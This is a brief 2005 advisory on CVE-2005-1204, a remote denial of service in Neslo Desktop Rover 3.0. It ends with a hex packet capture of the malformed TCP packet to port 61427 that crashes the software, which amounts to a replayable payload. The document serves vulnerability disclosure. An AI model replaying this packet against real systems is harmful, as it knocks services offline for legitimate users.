Neslo Desktop Rover 3.0 - Malformed Packet Remote Denial of Service

Related Vulnerabilities: CVE-2005-1204  
Publish Date: 20 Apr 2005
Author: Adam Baldwin


Neslo Desktop Rover is prone to a remote denial of service. Reports indicate that the software will crash when a malformed packet is processed on TCP port 61427.

A remote attacker may exploit this condition crash the software and effectively deny service for legitimate users. 

20:23:48.778009 > P [tcp sum ok]
1:13(12) ack 1 win 5840 (DF) (ttl 64, id 24051, len 64)

4500 0040 5df3 4000 4006 226e c0a8 1c85
c0a8 1c81 8003 eff3 90a8 d150 7cda 8afa
8018 16d0 daab 0000 0101 080a 0000 8cbe
0000 0000 6352 0100 0000 0000 0000 0000